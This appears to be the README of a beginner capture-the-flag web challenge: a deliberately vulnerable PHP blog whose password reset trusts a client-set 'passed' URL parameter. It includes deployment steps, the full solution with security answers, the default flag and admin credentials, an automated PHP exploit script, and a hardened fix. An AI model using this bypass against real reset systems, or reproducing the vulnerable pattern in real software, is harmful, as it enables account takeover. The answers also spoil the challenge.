NeverLAN-CTF/passwordreset
Password Reset Vulnerability Challenge

A blog with a vulnerable password reset system. Exploit the HTTP method vulnerability to reset the admin password and access the flag.

Challenge Description

You've discovered a blog with a password reset system that has some serious security flaws. The admin has a hidden post. Exploit the vulnerable password reset system and reset the admin's password. Login and

Building and Running

Using Makefile

The easiest way to deploy and manage this challenge is using the provided Makefile:

# Show available commands
make help

# Quick deployment with custom flag
make quick-deploy FLAG=flag{custom_flag_here}

# Standard deployment
make deploy

# Full rebuild
make rebuild

# Clean up
make clean

Using Docker Compose

  1. Build and run the challenge:
docker-compose up -d
  2. Access the challenge at: http://localhost

Using Custom Flag

To run with a custom flag, set the environment variable:

# Method 1: Use Makefile
make deploy FLAG=flag{custom_flag_here}

# Method 2: Export environment variable
export FLAG="flag{custom_flag_here}"
docker-compose up -d

# Method 3: Set environment variable before running
FLAG="flag{custom_flag_here}" docker-compose up -d

Using Build Script

./build.sh

Manual Docker Commands

If you prefer to run containers manually:

# Build the web image
docker build -t password-reset .

# Run MySQL container
docker run -d --name mysql \
  -e MYSQL_ROOT_PASSWORD=root_password \
  -e MYSQL_DATABASE=blog \
  -e MYSQL_USER=blog \
  -e MYSQL_PASSWORD=blog_password \
  -v $(pwd)/other/db.sql:/docker-entrypoint-initdb.d/init.sql \
  mysql:8.0

# Run web container
docker run -d --name web \
  -p 80:80 \
  -e FLAG="flag{custom_flag}" \
  -e DB_HOST=mysql \
  --link mysql \
  password-reset

Solution

The challenge involves exploiting multiple vulnerabilities in the password reset system:

Step 1: Explore the Application

  • Visit the main page to understand the blog structure
  • Notice there's a login page and password reset functionality

Step 2: Start Password Reset Process

  • Navigate to the password reset page (reset1.php)
  • Enter "admin" as the username

Step 3: Discover Security Questions

  • At reset2.php, you'll see the security questions
  • Security Question 1: "What is the difference between a GET request and a POST request and why does it matter to me specifically?"
  • Answer 1: "Well clearly a GET request is used to retrieve data from a server, while a POST request is used to send data to a server."
  • Security Question 2: "If a wood chuck could chuck wood as efficiently as they claim, how much wood would a wood chuck chuck if Chuck in fact didnt chuck any wood, but could and still would chuck wood if Chuck were a wood chuck?"
  • Answer 2: "I would say 42? Perchance."

Step 4: Bypass Security Questions

  • Answer the security questions
  • Examine the URL and notice the parameters that have been added: reset3.php?passed=false&username=admin
  • The server reads the result of the security-question check from this client-controlled parameter. Change passed=false to passed=true and reload

Step 5: Reset Password

  • Add new and confirm password
  • Login with new credentials
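
The five steps above, automated as a single PHP script. This is an added example, not code from the NeverLAN-CTF/passwordreset repository. The README documents only the username parameter on reset1.php and the passed and username parameters on reset3.php; the password and confirm names on reset4.php, the login.php field names, and the use of POST for login are assumptions, so check the actual forms before running it.

```php
<?php
// Added example: not part of the NeverLAN-CTF/passwordreset repository.
// Automates the Solution steps above against a local instance. Documented by
// the README: reset1.php takes "username"; reset3.php takes "passed" and
// "username". Assumed (not documented): reset4.php takes "password" and
// "confirm" via GET like the rest of the flow, and login.php takes "username"
// and "password" via POST. Adjust those names after inspecting the forms.

declare(strict_types=1);

const BASE_URL   = 'http://localhost';          // challenge is published on port 80
const COOKIE_JAR = '/tmp/passwordreset.cookies';

/** Send one request with a shared cookie jar and return the response body. */
function request(string $method, string $path, array $params = []): string
{
    $query = http_build_query($params);
    $url   = BASE_URL . '/' . $path . ($method === 'GET' && $query !== '' ? '?' . $query : '');
    $ch    = curl_init($url);
    $opts  = [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_COOKIEJAR      => COOKIE_JAR,   // keep any PHPSESSID across steps
        CURLOPT_COOKIEFILE     => COOKIE_JAR,
    ];
    if ($method === 'POST') {
        $opts[CURLOPT_POST]       = true;
        $opts[CURLOPT_POSTFIELDS] = $query;
    }
    curl_setopt_array($ch, $opts);
    $body = curl_exec($ch);
    if ($body === false) {
        throw new RuntimeException("$method $url failed: " . curl_error($ch));
    }
    curl_close($ch);
    return $body;
}

$newPassword = 'reset-' . bin2hex(random_bytes(6));

// Step 2: start the reset for the admin account.
request('GET', 'reset1.php', ['username' => 'admin']);

// Step 3 is where the app asks the security questions (reset2.php). The
// outcome of that check is not kept server-side: it travels in the URL as
// reset3.php?passed=false&username=admin, so the answers are irrelevant.

// Step 4: assert passed=true ourselves.
request('GET', 'reset3.php', ['passed' => 'true', 'username' => 'admin']);

// Step 5: submit the new password (parameter names assumed, see header).
request('GET', 'reset4.php', [
    'username' => 'admin',
    'password' => $newPassword,
    'confirm'  => $newPassword,
]);

// Log in with the new credentials and look for the flag in the hidden post.
$body = request('POST', 'login.php', ['username' => 'admin', 'password' => $newPassword]);
$body .= request('GET', 'index.php');
if (preg_match('/flag\{[^}]*\}/', $body, $m)) {
    echo "new admin password: $newPassword\nflag: {$m[0]}\n";
} else {
    echo "login sent, but no flag{...} in the response; inspect the pages manually\n";
}
```

Run it with php exploit.php against a deployed instance. The script never sends the security-question answers at all, which is the point: the check's outcome is decided by whoever writes the URL.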

Vulnerabilities

  1. HTTP Method Vulnerability: every step of the reset flow, including the outcome of the security-question check (passed=false), is carried in GET query parameters. The server trusts that client-controlled value, so anyone can set passed=true without answering; the same URLs, new password included, also end up in browser history, proxy and server logs, and Referer headers
  2. No Rate Limiting: no protection against brute-forcing the security-question answers
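
The two flaws side by side with a fixed version, as an added example that is not the challenge's own code. The vulnerable handler is reconstructed from the behaviour the Solution section describes (the real reset3.php may differ). The hardened flow assumes db.php exposes a PDO handle $pdo and a users table with username, password_hash, answer1_hash and answer2_hash columns holding password_hash() digests of the lower-cased, trimmed answers; the README documents none of that.

```php
<?php
// Added example, not code from the NeverLAN-CTF/passwordreset repository.
// Top: the pattern the Solution section exploits, reconstructed from the
// described behaviour (the real reset3.php may differ). Bottom: the same
// flow with the "passed" decision kept server-side. Assumptions: db.php
// provides a PDO handle $pdo, and users(username, password_hash,
// answer1_hash, answer2_hash) stores password_hash() digests of the
// lower-cased, trimmed security answers. The README documents neither.

declare(strict_types=1);
session_start();
require 'db.php';

// ----- Vulnerable pattern: the client tells the server whether it passed -----
function vulnerableReset3(): void
{
    // Nothing here proves the questions were answered; the value came from
    // the browser, so reset3.php?passed=true&username=admin walks straight in.
    if (($_GET['passed'] ?? 'false') !== 'true') {
        exit('Wrong answers.');
    }
    $username = $_GET['username'] ?? '';
    // ... render the new-password form for $username, submitting to reset4.php ...
}

// ----- Hardened flow: the server decides, and records the decision in the session -----

/** reset2.php handler: verify both answers server-side; success lives only in $_SESSION. */
function verifyAnswers(PDO $pdo, string $username, string $answer1, string $answer2): bool
{
    // Rate limit (vulnerability 2): five attempts per session, then refuse.
    $_SESSION['reset_attempts'] = ($_SESSION['reset_attempts'] ?? 0) + 1;
    if ($_SESSION['reset_attempts'] > 5) {
        return false;
    }
    $stmt = $pdo->prepare('SELECT answer1_hash, answer2_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return false;               // unknown user: same outcome as a wrong answer
    }
    $normalize = static fn (string $a): string => mb_strtolower(trim($a));
    $ok1 = password_verify($normalize($answer1), $row['answer1_hash']);
    $ok2 = password_verify($normalize($answer2), $row['answer2_hash']);   // always check both
    if (!($ok1 && $ok2)) {
        return false;
    }
    session_regenerate_id(true);
    $_SESSION['reset_user']    = $username;          // the only place "passed" now lives
    $_SESSION['reset_expires'] = time() + 600;       // ten-minute window
    $_SESSION['reset_csrf']    = bin2hex(random_bytes(16));
    return true;
}

/** reset4.php handler: POST only, only for a session that verified, never trusting the URL. */
function hardenedReset4(PDO $pdo): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);                      // no more password in the query string
        exit('Use POST.');
    }
    $user = $_SESSION['reset_user'] ?? null;          // username comes from the session, not $_GET
    if ($user === null || time() > ($_SESSION['reset_expires'] ?? 0)) {
        http_response_code(403);
        exit('Answer the security questions first.');
    }
    $token = $_POST['csrf'] ?? '';
    if (!is_string($token) || !hash_equals($_SESSION['reset_csrf'], $token)) {
        http_response_code(403);
        exit('Bad CSRF token.');
    }
    $password = $_POST['password'] ?? '';
    $confirm  = $_POST['confirm'] ?? '';
    if (!is_string($password) || strlen($password) < 12 || $password !== $confirm) {
        exit('Passwords must match and be at least 12 characters.');
    }
    $stmt = $pdo->prepare('UPDATE users SET password_hash = ? WHERE username = ?');
    $stmt->execute([password_hash($password, PASSWORD_DEFAULT), $user]);

    // One-shot: drop the reset state so the same session cannot reset again.
    unset($_SESSION['reset_user'], $_SESSION['reset_expires'],
          $_SESSION['reset_csrf'], $_SESSION['reset_attempts']);
    session_regenerate_id(true);
    echo 'Password updated. Please log in.';
}
```

The important change is not GET versus POST by itself but where the "passed" decision is stored: in the hardened version the client can send passed=true all day and it changes nothing, because reset4.php only consults $_SESSION, which the server wrote after checking the answers itself. Switching to POST then keeps the new password out of logs and history, and the CSRF token stops a third-party page from driving the last step.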

File Structure

passwordreset/
├── challenge.json     # Challenge metadata and configuration
├── Dockerfile         # Container definition
├── docker-compose.yml
├── build.sh          # Build script
├── README.md        
├── generate_sql.sh   # Database initialization script
├── web/              # Application source code
│   ├── index.php     
│   ├── login.php     
│   ├── reset1.php    
│   ├── reset2.php    
│   ├── reset3.php    
│   ├── reset4.php    
│   ├── db.php        # Database connection
│   ├── images/       # Image files
│   │   ├── cat-hugs.gif
│   │   ├── celebrate-1.gif
│   │   ├── celebrate-2.webp
│   │   ├── educaplay-computer.jpg
│   │   ├── failed.gif
│   │   ├── remember.gif
│   │   ├── skeleton-doot.webp
│   │   ├── stars.gif
│   │   ├── thinking-math.webp
│   │   └── uh-uh-uh.gif
│   └── css/          # CSS files
│       └── main.css
└── other/            # Database files
    ├── db.sql        # Database schema and data
    └── mysql.conf    # MySQL configuration

Configurable Variables

The challenge supports the following configurable variables:

  • FLAG: The flag value for this challenge instance
  • DB_USER: MySQL database username
  • DB_PASSWORD: MySQL database password
  • DB_NAME: MySQL database name
  • MYSQL_ROOT_PASSWORD: MySQL root password
  • CHALLENGE_NAME: Container naming prefix

Technical Details

  • Web Base Image: PHP 8.2 with Apache
  • Database: MySQL 8.0
  • Port: 80
  • Flag Environment Variable: FLAG
  • Default Flag: flag{Maybe_I_Should_Use_Something_Other_Than_The_Get_Method}
  • Admin Username: admin
  • Admin Password: blog_password

Difficulty Level

Beginner - This challenge introduces basic web security concepts:

  • Understanding HTTP methods and their security implications
  • Password reset security flaws
  • Admin privilege escalation
